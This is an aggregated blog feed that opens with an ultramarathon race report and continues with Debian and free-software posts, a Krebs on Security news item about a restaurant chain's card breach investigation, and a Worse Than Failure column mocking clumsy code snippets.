I am still fascinated by seeing how I can improve in this event; after running in pairs twice and now solo twice I signed up to come back this year, still seeing how much time I can lop off my lap of the course. Though I continually claim I am not a runner, with my mountain biking and adventure racing background, I have been getting out on foot a lot since I got into doing this event. With 12 hours as the arbitrary number I apply to the time around this course before I may admit I am a runner, I was coming back to see how close to this goal I would get.

My first year solo in 2014 I was positive I would finish, just not sure how fast; thinking on the day I may take around 15 hours, I managed 13:44, which at the time had me happy and a little surprised. In 2015 I had a few things interrupt my lead up and not everything felt great, so though I hoped to go under 13 hours I was not sure; managing 13:15 was not what I wanted but I got around the loop again anyway.

In 2016 I continued to not have a training program and simply work toward goals by judging effort in my head and race schedule leading up to the event. However most running science seems to suggest the more you can run without getting injured the better. So on January 1st 2016 I kicked off a running streak to see how long it would last. I managed to run every day in 2016 until Wednesday before UTA100, so 132 days in a row with a minimum distance of 5km. This included the days before and after efforts such as the razorback ultra in Victoria and the Six Foot Track marathon in the Blue Mountains.

I never really managed to get much speed work into my prep again this year, however I had definitely upped my volume, doing between 70 and 125km every week of the year, with most of it on trails with some good altitude gain at times. I also remained uninjured and able to run every day, which was great; even with the odd fall or problem I could work around it and keep moving, so I was feeling good before the event. Due to my tendency to waste time at the check points on course I also had my sister here to support me this year so I would be able to run into CP 3, 4 and 5, grab new bottles, have food shoved at me and head on out.

All was looking fairly good and I was sure I could go under 13 hours this year; the question remained how far under I could get. Then Wednesday night before the race I got home feeling awful and shivering and needed to crawl into bed early and get sleep. Waking up Thursday I felt worse if possible and was worried it was all over: I had gotten sick and nothing would help. I left work at 2pm that day and headed home to sleep the rest of the day. Fortunately by the time I woke on Friday morning I no longer felt so awful, and actually felt I may be able to run the next day. I had stopped my running streak on Wednesday; there was no real need to continue it, and feeling so bad for two days it definitely had to stop.

I arrived Friday afternoon, spent money with Graham and Hanny in their store for some stuff I needed from Find Your Feet and headed to the briefing. The welcome to country from David King was once again a highlight of the runners briefing; it is a fantastic part of the race every year and really heartfelt, genuine and funny. I met my sister Jane at our accommodation and discussed the race day and estimated times while eating dinner. Fortunately I finally felt ready to run again by the time I went to sleep Friday night. I had a few runs the week before with what I call Happy Legs, where you feel awesome running and light and happy on your feet. Though I hoped for that on Saturday I knew I just had to get out on the track and keep moving well.

I was in wave 1 and starting at 6:20am, had a chat with my mate Tom Reeve on the start line and then we got moving, taking it easy on the 5km bitumen loop I had a chat with Phil Whitten who was worried after stomach issues in six foot caused him problems he may have issues today too (in the end he did alas), still it was nice to be moving and cruising along the out and back before the steps. In wave 1 it was nice and open and even the descent down Furber steps was pretty open. Ran through toward the golden stairs feeling OK, never awesome but not like it was going to be a horrible day out.

I got onto the fire road out Narrow Neck and realised I was probably a few beats higher than I should be HR wise, however I decided to stay with it and ensure I did not push too hard on the hill climbs along here. With the start out and back slightly extended this year it was good to pass through CP1 in the same time as last year, so on course for slightly faster, however I would not have a proper idea of time and how I was going until Dunphys camp. On the climb from Cedar gap I noticed some people around me seemed to be pushing harder than I thought they should, however that had nothing to do with me so I kept moving and hoping I survived. On the descent down to the camp I had my left adductor cramp a bit, which seems to happen here every year, so I have to manage it and keep going.

At Dunphys CP I had a chat to Myf happy to actually see her or Matt this year (I missed seeing them here last year) and got moving aware I would need to take it easy on iron pot to keep the cramps at bay. I got onto Iron Pot and loved being able to say thanks to David King and his colleagues welcoming us to country with Didgeridoo and clap sticks up there, the short out and back made it easier this year and then I took it really easy on the loose ski slope sort of descent down due to cramps being close to the surface. Continued taking it easy chatting with other runners as we went back past the outgoing track on our right and then we dropped down to the bottom of the valley to start heading up Megalong Rd.

Looking at my watch I was probably behind time to do sub 12 hours already at this point but would have a much better idea once I got to Six Foot CP in a little while. I took it easy climbing the road at a strong power walk and then managed a comfortable 4 to 5 minute pace along the road into the CP. I got out of CP3 just before the 5 hour mark; this confirmed I was unlikely to go under 12 hours, as I expected I needed to be gone from here in 4h40m to manage sub 12 knowing how I was feeling. I grabbed some risotto and baked potatoes with salt from Jane to see if I could eat these for some variety rather than sweet crap while climbing to Katoomba. On the way into the CP I passed Etienne who had an injury, so I asked her to see if he needed help when he got in (though that made it harder for her to get to me in time at Katoomba; fortunately Etienne had his parents there to help him out when he had to withdraw there).

Trying to eat the solid food was difficult and slowing me down so I gave up by the time I hit the single track just before the stairs. I had a chat with a blonde woman (it may have been Daniela Burton) and it was her first 100 so I told her not to get discouraged by how long the next leg (CP4 to CP5) takes and to keep focusing on moving forward. I also had a chat with Ben Grimshaw a few times on the way up Nellies as I was passed by him while trying to eat solid food and then caught him again on the stairs once I started pushing up there reasonably fast once more. We cruised through the single track at the top passing a few runners and got into CP4 pretty much together.

I had to refill my water bladder here as well as get two new bottles; still, with Jane's help I got out of here fast and left by 6 hours 30 minutes on the race clock, though behind Ben now as he was quicker in the CP. Now I was happy to hit my race goal of feeling pretty good at Katoomba and still being keen to run, which is always the way I think you need to feel at this point, as the next leg is the crux of the race: the half marathon of stairs is really a tough mental and physical barrier to get through.

I headed along to echo point through some crowds on the walk way near the cliff edge and it was nice to have some of the tourists cheering us on, a few other runners were near by and we got through nicely. On the descent down the giant stair case I seemed to pass a few people pretty comfortably and then on to Dardanelle's pass and it was nice running through there for a while. Of course getting down to Leura forest we got to see some 50km runners coming the other way (a few asked me where I was going worried they had made a wrong turn, when I said I was a 100km runner they realised all was cool told me well done and kept going).

I caught Ben again on the way up the stairs from Leura forest and we were near each other a bit for a while then, however I seemed to pull ahead on stairs a bit, so over the next while I got away from him (he caught me later in the race anyway though). Last year I had a diabetic low blood sugar incident in this leg, somewhere just before the Wentworth Falls lookout carpark I think. So I was paying more attention through the day to constant calorie intake, with lots of Clif shot blocks and GU gels. I kept moving well enough through this whole leg so that turned out well. I said hi to Graham (Hammond), who was cheering runners on at the Fairmont resort water station, and ran on for a few more stairs.

Running in to CP 5 on king tableland road I still felt alright and managed to eat another three cubes of shot block there. I had run out of plain water (bladder) again so had not had a salt tablet for a little while. This year I had decided to run with more salt consumption and had bought hammer enduralyte salt tablets, I was downing 1 or 2 of them every time I ate all day which I think may have helped, though I still had cramps around Dunphys that happens every year and I knew I had run a bit hard early anyway (hoping to hit splits needed for sub 12). However even though it was a hot day and many people struggled more in the heat than other years I seemed to deal with it well. However I had discovered I struggled to down the tablets with electrolyte drink from my bottles (high 5 tablets, usually berry flavour) so I needed plain water from the camelback for them.

I got more food from Jane at CP5, re-lubed myself a bit, refilled the bladder and got moving. I also grabbed a second head torch; though I was carrying one already, I liked the beam pattern more on the one I grabbed here, though with full water, bottles and the extra torch I felt pretty heavy running out of CP 5. Still, just 3 hours to go now I expected. I got out of there at 9h25m on the race clock which was good, thus if I could have a good run through here I may be able to get in under 12h20m (a 2h50m run would be nice for this leg at this point). I got moving on the approach to the Kedumba descent joking with a few others around me that it was time to smash the quads and say good bye to them as they were no longer needed after this really (only one short sort of descent to Leura creek). I was asked if we needed quads on the stairs; my response was they were a glute fest and allowed use of arms due to the railing, so who needs quads after Kedumba.

However as I got on to the descent and passed under the overhang I noticed my legs were a bit off and I could not open up well, I thought about it and realised I was probably low on sugar and needed to eat, eating at this sort of downhill pace was a bit hard (especially as some food was making me feel like throwing up (gels)). I thought I would try to hang on until the bottom as I could walk up out of Jamisons creek eating. However I needed to slow to a walk just after passing the Mt Solitary turn off and down a gel. Then a few minutes later trying to run still did not work so I had to stop and walk and eat for a while again rather than descending at full speed. Doing all of that I was passed by a few people (I think the woman who came 5th, the guy I joked about not needing Quads with and a few others).

Oh well, I should have eaten more while stopped at the CP or on the flat at the top; oops, lost time (in the results, comparing with people I ran similar splits to all day, I may have lost as much as 15 minutes here with this issue). Once I got onto the climb out of Jamisons creek I ate some more and focused on holding a reasonably strong hike; the people who passed me were long gone and I could not motivate myself to push hard to see if I would catch them or not. I was passing a number of 50km runners by this point (I think the sweep must have been at CP5 when I went through). They were fun to cheer on and chat with as I caught and passed them; getting down to Leura creek was good as it was still daylight and I could get moving up there to the last aid and onto the finish before I thought about lights.

Ben caught me again here saying he had really pushed hard on the Kedumba descent, and he was looking good so sat a little ahead of me up to the aid station. I refilled my bottles and kept going, chatting with 50km runners as I passed them. I got to the poo farm a bit quicker than I expected (going on feeling as I was not looking at my watch much), however it was good to finally be up on Federal pass not long after that and this is where I decided to focus on moving fast. The last two years I crawled along here and I think I lost a lot of time; I know last year I had mentally given up so was crawling, and the year before I think I was just a bit stuffed by then. This time I focused on running whenever it was not a steep up and on getting over to the stairs as quickly as possible.

It was still fun cheering on the 50km runners and chatting with them as I passed, I even saw some women in awesome pink outfits I had seen here a few weeks earlier while training so it was good to cheer them on, when I asked them about it they said it was them and they recognised me (it's pinky they exclaimed) as I passed. I got to the base of the stairs at 12:14 so knew I had to work hard to finish in under 12:30 but it was time to get that done if possible. On the climb up the stairs it felt like I was getting stuck behind 50km runners on many of the narrow sections of stairs however it probably was not much time slowing up the pace (one occasion a race doctor was walking up the stairs with a runner just to help them get to the finish). I managed to get across the finish line in 12:29:51 (57th overall) which was a good result all things considered.

Thanks go to Jane for coming up from Sydney and supporting me all day; Tom, Al and AROC for keeping the fun happening for all the runners; Dave and co for some excellent course markings; all the other AROC people and volunteers; and David, Julie, Alex and others for company on lots of the training the last few months. I have a few ideas for what I need to work on next to get faster on this course, however I am thinking I may have a year off UTA100 to go do something else. The Hubert race in South Australia at the start of May looks like it could be awesome (running in the Wilpena Pound area through the Flinders Ranges) and it will probably be good to develop my base and speed a bit more over time before my next attempt to see if I can become a runner (crack 12 hours on this course).

UTA100 really is the pinnacle of trail running in Australia with the level of competition, the quality and fun of the course, the vibe on course, the welcome to country, the event history and everything else, so I highly recommend it to anyone keen to challenge themselves. Even if, so far this year, the event that has really grabbed my attention the most is probably the Razorback Ultra, it is a very different day out to UTA100, so it is all good fun to get outdoors and enjoy the Australian wilderness.

Planet Debian: Reproducible builds folks: Improving the process for testing build reproducibility

Hi! I'm Ceridwen. I'm going to be one of the Outreachy interns working on Reproducible Builds for the summer of 2016. My project is to create a tool, tentatively named reprotest, to make the process of verifying that a build is reproducible easier.

The current tools and the Reproducible Builds site have limits on what they can test, and they're not very user friendly. (For instance, I ended up needing to edit the rebuild.sh script to run it on my system.) Reprotest will automate some of the busywork involved and make it easier for maintainers to test reproducibility without detailed knowledge of the process involved. A session during the Athens meeting outlines some of the functionality and command-line and configuration file API goals for reprotest. I also intend to use some ideas, and command-line and config processing boilerplate, from autopkgtest. Reprotest, like autopkgtest, should be able to interface with more build environments, such as schroot and qemu. Both autopkgtest and diffoscope, the program that the Reproducible Builds project uses to check binaries for differences, are written in Python, and as Python is the scripting language I'm most familiar with, I will be writing reprotest in Python too.

One of my major goals is to get a usable prototype released in the first three to four weeks. At that point, I want to try to solicit feedback (and any contributions anyone wants to make!). One experience I've had in open source software is that connecting people with software they might want to use is often the hardest part of a project. I've reimplemented existing functionality myself because I simply didn't know that someone else had already written something equivalent, and seen many other people do the same. Once I have the skeleton fleshed out, I'm going to be trying to find and reach out to any other communities, outside the Debian Reproducible Builds project itself, who might find reprotest useful.


Planet Debian: Matthew Garrett: Your project's RCS history affects ease of contribution (or: don't squash PRs)

Github recently introduced the option to squash commits on merge, and even before then several projects requested that contributors squash their commits after review but before merge. This is a terrible idea that makes it more difficult for people to contribute to projects.

I'm spending today working on reworking some code to integrate with a new feature that was just integrated into Kubernetes. The PR in question was absolutely fine, but just before it was merged the entire commit history was squashed down to a single commit at the request of the reviewer. This single commit contains type declarations, the functionality itself, the integration of that functionality into the scheduler, the client code and a large pile of autogenerated code.

I've got some familiarity with Kubernetes, but even then this commit is difficult for me to read. It doesn't tell a story. I can't see its growth. Looking at a single hunk of this diff doesn't tell me whether it's infrastructural or part of the integration. Given time I can (and have) figured it out, but it's an unnecessary waste of effort that could have gone towards something else. For someone who's less used to working on large projects, it'd be even worse. I'm paid to deal with this. For someone who isn't, the probability that they'll give up and do something else entirely is even greater.

I don't want to pick on Kubernetes here - the fact that this Github feature exists makes it clear that a lot of people feel that this kind of merge is a good idea. And there are certainly cases where squashing commits makes sense. Commits that add broken code and which are immediately followed by a series of "Make this work" commits also impair readability and distract from the narrative that your RCS history should present, and Github presents this feature as a way to get rid of them. But that ends up being a false dichotomy. A history that looks like "Commit", "Revert Commit", "Revert Revert Commit", "Fix broken revert", "Revert fix broken revert" is a bad history, as is a history that looks like "Add 20,000 line feature A", "Add 20,000 line feature B".

When you're crafting commits for merge, think about your commit history as a textbook. Start with the building blocks of your feature and make them one commit. Build your functionality on top of them in another. Tie that functionality into the core project and make another commit. Add client support. Add docs. Include your tests. Allow someone to follow the growth of your feature over time, with each commit being a chapter of that story. And never, ever, put autogenerated code in the same commit as an actual functional change.

People can't contribute to your project unless they can understand your code. Writing clear, well commented code is a big part of that. But so is showing the evolution of your features in an understandable way. Make sure your RCS history shows that, otherwise people will go and find another project that doesn't make them feel frustrated.

(Edit to add: Sarah Sharp wrote on the same topic a couple of years ago)


Planet Debian: Antoine Beaupré: My free software activities, May 2016

Debian Long Term Support (LTS)

This is my 6th month working on Debian LTS, started by Raphael Hertzog at Freexian. This is my largest month so far, for which I had requested 20 hours of work.

Xen work

I spent the largest amount of time working on the Xen packages. We had to re-roll the patches because it turned out we originally just imported the package from Ubuntu as-is. This was a mistake because that package forked off the Debian packaging a while ago and included regressions in the packaging itself, not just security fixes.

So I went ahead and rerolled the whole patchset and tested it on Koumbit's test server. Brian May then completed the upload, which included about 40 new patches, mostly from Ubuntu.

Frontdesk duties

Next up was the frontdesk duties I had taken this week. This was mostly uneventful, although I had forgotten how to do some of the work and thus ended up doing extensive work on the contributor's documentation. This is especially important since new contributors joined the team! I also did a lot of Debian documentation work in my non-sponsored work below.

The triage work involved chasing around missing DLAs, triaging away OpenJDK-6 (for which, let me remind you, security support has ended in LTS), and raising the question of Mediawiki maintenance.

Other LTS work

I also did a bunch of smaller stuff. Of importance, I can note that I uploaded two advisories that were pending from April: NSS and phpMyAdmin. I also reviewed the patches for the ICU update, since I built the one for squeeze (but didn't have time to upload before squeeze hit end-of-life).

I have tried to contribute to the NTP security support but that was way too confusing to me, and I have left it to the package maintainer which seemed to be on top of things, even if things mean complete chaos and confusion in the world of NTP. I somehow thought that situation had improved with the recent investments in ntpsec and ntimed, but unfortunately Debian has not switched to the ntpsec codebase, so it seems that the NTP efforts have diverged in three different projects instead of closing into a single, better codebase.

Future LTS work

This is likely to be my last month of work on LTS until September. I will try to contribute a few hours in June, but July and August will be very busy for me outside of Debian, so it's unlikely that I contribute much to the project during the summer. My backlog included those packages which might be of interest to other LTS contributors:

  • libxml2: no upstream fix, but needs fixing!
  • tiff{,3}: same mess
  • libgd2: maintainer contacted
  • samba regression: mailed bug #821811 to try to revive the effort
  • policykit-1: to be investigated
  • p7zip: same

Other free software work

Debian documentation

I wrote a detailed short guide to Debian package development, something I felt was missing from the existing corpus, which seems to be too focused on covering all alternatives. My guide is opinionated: I believe there is a right and wrong way of doing things, or at least, there are best practices, especially when just patching packages. I ended up retroactively publishing that as a blog post - now I can simply tag an item with blog and it shows up in the blog.

(Of course, because of a mis-configuration on my side, I have suffered from long delays publishing to Debian planet, so all the posts dates are off in the Planet RSS feed. This will hopefully be resolved around the time this post is published, but this allowed me to get more familiar with the Planet Venus software, as detailed in that other article.)

Apart from the guide, I have also done extensive research to collate information that allowed me to create workflow graphs of the various Debian repositories, which I have published in the Debian Release section of the Debian wiki. Here is the graph:

It helps me understand how packages flow between different suites and who uploads what where. This emerged after I realized I didn't really understand how "proposed updates" worked. Since we are looking at implementing a similar process for the security queue, I figured it was useful to show what changes would happen, graphically.

I have also published a graph that describes the relations between different software that make up the Debian archive. The idea behind this is also to provide an overview of what happens when you upload a package in the Debian archive, but it is more aimed at Debian developers trying to figure out why things are not working as expected.

The graphs were done with Graphviz, which allowed me to link to various components in the graph easily, which is neat. I also preferred Graphviz over Dia or other tools because it is easier to version and I don't have to bother (too much) about the layout and tweaking the looks. The downside is, of course, that when Graphviz makes the wrong decision, it's actually pretty hard to make it do the right thing, but there are various workarounds that I have found that made the graphs look pretty good.

The source is of course available in git but I feel all this documentation (including the guide) should go in a more official document somewhere. I couldn't quite figure out where. Advice on this would be of course welcome.

Ikiwiki

I have made yet another plugin for Ikiwiki, called irker, which enables wikis to send notifications to IRC channels, thanks to the simple irker bot. I had trouble with Irker in the past, since it was not quite reliable: it would disappear from channels and not return when we'd send it a notification. Unfortunately, the alternative, the KGB bot is much heavier: each repository needs a server-side, centralized configuration to operate properly.

Irker's design is simpler and more adapted to a simple plugin like this. Let's hope it will work reliably enough for my needs.

I have also suggested improvements to the footnotes styles, since they looked like hell in my Debian guide. It turns out this was an issue with the multimarkdown plugin that doesn't use proper semantic markup to identify footnotes. The proper fix is to enable footnotes in the default Discount plugin, which will require another, separate patch.

Finally, I have done some improvements (I hope!) on the layout of this theme. I made the top header much lighter and transparent to work around an issue where followed anchors would be hidden under the top header. I have also removed the top menu made out of the sidebar plugin because it was cluttering the display too much. Those links are all on the frontpage anyways and I suspect people were not using them so much.

The code is, as before, available in this git repository although you may want to start from the new ikistrap theme that is based on Bootstrap 4 and that may eventually be merged in ikiwiki directly.

DNS diagnostics

Through this interesting overview of various *ping tools, I found out about the dnsdiag tool, which currently allows users to do DNS traces, tampering detection and ping over DNS. In the hope of packaging it into Debian, I have requested clarifications regarding a modification to the DNSpython library the tool uses.
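
As a rough illustration of the "ping over DNS" idea (this is not dnsdiag itself, just a sketch using the dnspython library it builds on; the nameserver and hostname are arbitrary):

import time
import dns.resolver  # python-dnspython

resolver = dns.resolver.Resolver()
resolver.nameservers = ['8.8.8.8']  # resolver to probe

for i in range(5):
    start = time.time()
    resolver.query('debian.org', 'A')   # resolve() on dnspython >= 2.0
    elapsed = (time.time() - start) * 1000
    print('reply %d: %.1f ms' % (i + 1, elapsed))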

But I went even further and boldly opened a discussion about replacing DNSstuff, the venerable DNS diagnostic tool that is now commercial. It is somewhat surprising that there is no software that has ever been publicly released that does those sanity checks for DNS, given how old DNS is.

Incidentally, I have also requested smtpping to be packaged in Debian as well but httping is already packaged.

Link checking

In the process of writing this article, I suddenly remembered that I constantly make mistakes in the various links I post on my site. So I started looking at a link checker, another tool that should be well established but that, surprisingly, is not quite there yet.

I have found this neat software written in Python called LinkChecker. Unfortunately, it is basically broken in Debian, so I had to do a non-maintainer upload to fix that old bug. I managed to force myself to not take over maintainership of this orphaned package but I may end up doing just that if no one steps up the next time I find issues in the package.

One of the problems I had checking links in my blog is that I constantly refer to sites that are hostile to bots, like the Debian bugtracker and MoinMoin wikis. So I published a patch that adds a --no-robots flag to be able to crawl those sites effectively.

I know there is the W3C tool but it's written in Perl, and there's probably zero chance for me to convince those guys to bypass robots exclusion rules, so I am sticking to Linkchecker.

Other Debian packaging work

At my request, Drush has finally been removed from Debian. Hopefully someone else will pick up that work, but since it basically needs to be redone from scratch, there was no sense in keeping it in the next release of Debian. Similarly, Semanticscuttle was removed from Debian as well.

I have uploaded new versions of tuptime, sopel and smokeping. I have also filed a Request For Help for Smokeping. I am happy to report there was a quick response and people will be stepping up to help with the maintenance of that venerable monitoring software.

Background radiation

Finally, here's the generic background noise of me running around like a chicken with his head cut off:

Finally, I should mention that I will be less active in the coming months, as I will be heading outside as the summer finally came! I somewhat feel uncomfortable documenting publicly my summer here, as I am more protective of my privacy than I was before on this blog. But we'll see how it goes, maybe you'll hear non-technical articles here again soon!

Planet Debian: Steve Kemp: Accidental data-store .. is go!

A couple of days ago I wrote:

The code is perl-based, because Perl is good, and available here on github:

..

TODO: Rewrite the thing in #golang to be cool.

I might not be cool, but I did indeed rewrite it in golang. It was quite simple, and a simple benchmark of uploading two million files, balanced across 4 nodes, worked perfectly.

https://github.com/skx/sos/

Planet Debian: Valerie Young: Summer of Reproducible Builds

 

Hello friend, family, fellow Outreachy participants, and the Debian community!

This blog's primary purpose will be to track the progress of the Outreachy project in which I'm participating this summer 🙂  This post is to introduce myself and my project (working on the Debian reproducible builds project).

What is Outreachy? You might not know! Let me empower you: Outreachy is an organization connecting women and minorities to mentors in the free (as in freedom) software community, /and/ to funding for three months to work with the mentors and contribute to a free software project.  If you are a woman or minority human that likes free software, or if you know anyone in this situation, please tell them about Outreachy 🙂 Or put them in touch with me; I'd happily tell them more.

So who am I?

My name is Valerie Young. I live in the Boston Metropolitan Area (any other outreachy participants here?) and hella love free software. 

Some bullet pointed Val facts in rough reverse chronological order:
- I run Debian but only began contributing during the Outreachy application process
- If you went to DebConf2015, you might have seen me dye nine people's hair blue, blond or Debian swirl.
- If you stop through Boston I could be easily convinced to dye your hair.
- I worked on an electronic medical records web application for the last two years (lotsa Javascriptin' and Perlin' at athenahealth)
- Before that I taught a programming summer program at the University of Moratuwa in Sri Lanka.
- Before that I got degrees in physics and computer science at Boston University.
- At BU I helped start a hackerspace where my interest in technology, free software, hacker culture, anarchy, the internet all began.
- I grew up in the very fine San Francisco Bay Area.

What will I be working on?

Reproducible builds!

In the near future I'll write a “What is reproducible builds? Why is it so hot right now?” post.  For now, from a high (and not technical) level, reproducible builds is a broad effort to verify that the computer executable binary programs you run on your computer come from the human-readable source code they claim to. It is not presently /impossible/ to do this verification, but it's not easy, and there are a lot of nuanced computer quirks that make it difficult even for the most experienced programmer and straight-up impossible for a user with no technical expertise. And without this ability to verify -- the state we are in now -- any executable piece of software could be hiding secret code.

The first step towards the goal of verifiability is to make reproducibility an essential part of software development. Reproducible builds means this: when you compile a program from the source code, the result should always be identical, bit by bit. If the program is always identical, you can compare your version of the software to a trusted programmer's build with very little effort. If it is identical, you can trust it -- if it's not, you have reason to worry.
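
In practice, "identical, bit by bit" is easy to check: hash both build results and compare. A minimal sketch (the file paths are placeholders):

    # Minimal sketch: check that two independently built artifacts are
    # bit-for-bit identical by comparing their SHA-256 digests.
    import hashlib

    def digest(path):
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        return h.hexdigest()

    # Placeholder paths: your build of a package versus someone else's.
    mine = digest("my-build/hello_1.0_amd64.deb")
    theirs = digest("their-build/hello_1.0_amd64.deb")
    print("reproducible!" if mine == theirs else "builds differ -- investigate")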

The Debian project is undergoing an effort to make the entire Debian operating system verifiably reproducible (hurray!). My Outreachy-funded summer contribution involves improving and updating tests.reproducible-builds.org – a site that presently surfaces the results of reproducibility testing of several free software projects (including Debian, Fedora, coreboot, OpenWrt, NetBSD, FreeBSD and ArchLinux). However, the design of test.r-b.org is a bit confusing, making it difficult for a user to find how to check on the reproducibility of a given package for one of the aforementioned projects, or to understand the reasons for failure. Additionally, the backend test results of Debian are outgrowing the original SQLite database, and many projects do not log the results of package testing at all. I hope, by the end of the summer, we'll have a more beefed-out and pretty site as well as better organized backend data 🙂

This summer there will be 3 other Outreachy participants working on the Debian reproducible builds project! Check out their blogs/projects:
Scarlett
Satyam
Ceridwen

Thanks to our Debian mentors -- Lunar, Holger Levsen, and Mattia Rizzolo -- for taking us on 🙂 

 

Planet DebianMichal Čihař: wlc 0.3

wlc 0.3, a command line utility for Weblate, has just been released. This is probably the first release which is worth using, so it's probably also worth a bigger announcement.

It is built on the API introduced in Weblate 2.6, which is still in development. Several commands in wlc will not work properly if executed against Weblate 2.6; the first fully supported version will be 2.7 (current git is okay as well, and it is now running on both the demo and hosting servers).

How to use it? First you will probably want to store the credentials, so that your requests are authenticated (you can do unauthenticated requests as well, but obviously only read-only ones and on public objects), so let's create ~/.config/weblate:

[weblate]
url = https://hosted.weblate.org/api/

[keys]
https://hosted.weblate.org/api/ = APIKEY

Now you can do basic commands:

$ wlc show weblate/master/cs
...
last_author: Michal Čihař
last_change: 2016-05-13T15:59:25
revision: 62f038bb0bfe360494fb8dee30fd9d34133a8663
share_url: https://hosted.weblate.org/engage/weblate/cs/
total: 1361
total_words: 6144
translate_url: https://hosted.weblate.org/translate/weblate/master/cs/
translated: 1361
translated_percent: 100.0
translated_words: 6144
url: https://hosted.weblate.org/api/translations/weblate/master/cs/
web_url: https://hosted.weblate.org/projects/weblate/master/cs/

You can find more examples in the wlc documentation.


Planet Linux AustraliaGary Pendergast: Introducing: Linkify for Chrome

In WordPress 4.2, a fun little feature was quietly snuck into Core; I’m always delighted to see people’s reactions when they discover it.

But there’s still a problem – WordPress is only ~26% of the internet, so how can you get the same feature on the other 74%? Well, that problem has now been rectified. Introducing Linkify for Chrome:

Thank you to Davide for creating Linkify’s excellent icon!

Linkify is a Chrome extension to automatically turn a pasted URL into a link, just like you’re used to in WordPress. It also supports Trac and Markdown-style links, so you can paste links on your favourite bug trackers, too.

Speaking of bug trackers, if there are any other link formats you’d like to see, post a ticket over on the Linkify GitHub repo!

Oh, and speaking of Chrome extensions, you might be like me, and find the word “emojis” to be extraordinarily awkward. If so, I have another little extension, just for you.

Planet DebianPetter Reinholdtsen: I want the courts to be involved before the police can hijack a news site DNS domain (#domstolkontroll)

I just donated to the NUUG defence fund to support the effort in Norway to get the seizure of the news site popcorn-time.no tested in court. I hope everyone who agrees with me will do the same.

Would you be worried if you knew the police in your country could hijack the DNS domains of news sites covering a free software system without talking to a judge first? I am. What if the free software system combined search engine lookups, bittorrent downloads and video playout and was called Popcorn Time? Would that affect your view? It still makes me worried.

In March 2016, the Norwegian police seized the DNS domain popcorn-time.no (as in, forced NORID to change the IP address it points to, to one controlled by the police), without any supervision from the courts. I did not know about the web site back then, and assumed the courts had been involved, and was very surprised when I discovered that the police had hijacked the DNS domain without asking a judge for permission first. I was even more surprised when I had a look at the web site content on the Internet Archive, and only found news coverage about Popcorn Time, not any material published without the right holders' permission.

The seizure was widely covered in the Norwegian press (see for example Hegnar Online and ITavisen and NRK), at first due to the press release sent out by Økokrim, but then based on protests from the law professor Olav Torvund and lawyer Jon Wessel-Aas. It even got some coverage on TorrentFreak.

I wrote about the case a month ago, when the Norwegian Unix User Group (NUUG), where I am an active member, decided to ask the courts to test this seizure. The request was denied, but NUUG and its co-requestor EFN have not given up, and now they are rallying for support to get the seizure legally challenged. They accept both bank and Bitcoin transfer for those that want to support the request.

If you, like me, believe news sites about free software should not be censored, even if the free software has both legal and illegal applications, and that DNS hijacking should be tested by the courts, I suggest you show your support by donating to NUUG.

Krebs on SecurityNoodles & Company Probes Breach Claims

Noodles & Company [NASDAQ: NDLS], a fast-casual restaurant chain with more than 500 stores in 35 U.S. states, says it has hired outside investigators to probe reports of a credit card breach at some locations.

Over the past weekend, KrebsOnSecurity began hearing from sources at multiple financial institutions who said they’d detected a pattern of fraudulent charges on customer cards that were used at various Noodles & Company locations between January 2016 and the present.

Asked to comment on the reports, Broomfield, Colo.-based Noodles & Company issued the following statement:

“We are currently investigating some unusual activity reported to us Tuesday, May 16, 2016 by our credit card processor. Once we received this report, we alerted law enforcement officials and we are working with third party forensic experts. Our investigation is ongoing and we will continue to share information.”

The investigation comes amid a fairly constant drip of card breaches at main street retailers, restaurant chains and hospitality firms. Wendy’s reported last week that a credit card breach that began in the autumn of 2015 impacted 300 of its 5,500 locations.

Cyber thieves responsible for these attacks use security weaknesses or social engineering to remotely install malicious software on retail point-of-sale systems. This allows the crooks to read account data off a credit or debit card’s magnetic stripe in real time as customers are swiping them at the register.

U.S. banks have been transitioning to providing customers more secure chip-based credit and debit cards, and a greater number of retailers are installing checkout systems that can read customer card data off the chip. The chip encrypts the card data and makes it much more difficult and expensive for thieves to counterfeit cards.

However, most of these chip cards will still hold customer data in plain text on the card’s magnetic stripe, and U.S. merchants that continue to allow customers to swipe the stripe or who do not have chip card readers in place face shouldering all of the liability for any transactions later determined to be fraudulent.

While a great many U.S. retail establishments have already deployed chip-card readers at their checkout lines, relatively few have enabled those readers, and are still asking customers to swipe the stripe. For its part, Noodles & Company says it’s in the process of testing and implementing chip-based readers.

“The ongoing program we have in place to aggressively test and implement chip-based systems across our network is moving forward,” the company said in a statement. “We are actively working with our key business partners to deploy this system as soon as they are ready.”

Worse Than FailureCoded Smorgasbord: A Spiritual Journey

Hold your souls tightly, for today, we pierce the veil into the great beyond. We shall examine existential questions and commune with spirits. We shall learn what eternity holds for us all.

First, we must bring ourselves to the edge of death, into a liminal state where time does not pass, where the conscious mind takes a back-seat to the spiritual realm. Mark found this C# code to do the job:

    if (Thread.CurrentThread.ThreadState != ThreadState.Running)
        return false;

Are we alive? Are we dead? What is this darkness? Where are we? Surely, we must now find our path. Many languages, like Python, have useful libraries to help us parse out and understand the structure of our path. Chris sent us this code, which eschews the well traveled os.path library, and reinvents that wheel:

    samp = file[file.find('intFiles')+9:].split("/")[0]
    fName = file.split("/")[-1]

This code pulls off the portion of the path that occurs after intFiles, and splits off the last portion, which we hope is a filename. Now, with that filename, the collective sin on our souls must be weighed, and our eternal reward- or punishment- will be delivered.
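
(For contrast, a mortal armed only with the standard library might have written something like the following; a rough sketch that assumes, as the original's find()+9 arithmetic seems to, that intFiles is an exact path component in a slash-separated path.)

    # Rough equivalent of the snippet above, using the standard library.
    # Assumes 'file' holds a slash-separated path and that 'intFiles' is an
    # exact path component.
    import os.path

    parts = file.split("/")
    samp = parts[parts.index("intFiles") + 1]   # component right after intFiles
    fName = os.path.basename(file)              # the last path component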

Brandon knows what the afterlife holds for us all… welcome to hell:

If Error=0 Then
    Error = DeleteSummaryTables(Conn, sJobId, "Summary_Grips")
    If Error = 0 Then
        Error = DeleteSummaryTables(Conn, sJobId, "Summary_GroundType")
        If Error = 0 Then
            Error = DeleteSummaryTables(Conn, sJobId, "Summary_Enviroment")
            If Error = 0 Then
                Error = DeleteSummaryTables(Conn, sJobId, "Summary_FloorType")
                If Error = 0 Then
                    Error = DeleteSummaryTables(Conn, sJobId, "Summary_Control")
                    If Error = 0 Then
                        Error = DeleteSummaryTables(Conn, sJobId, "Summary_HandToolType")
                        If Error = 0 Then
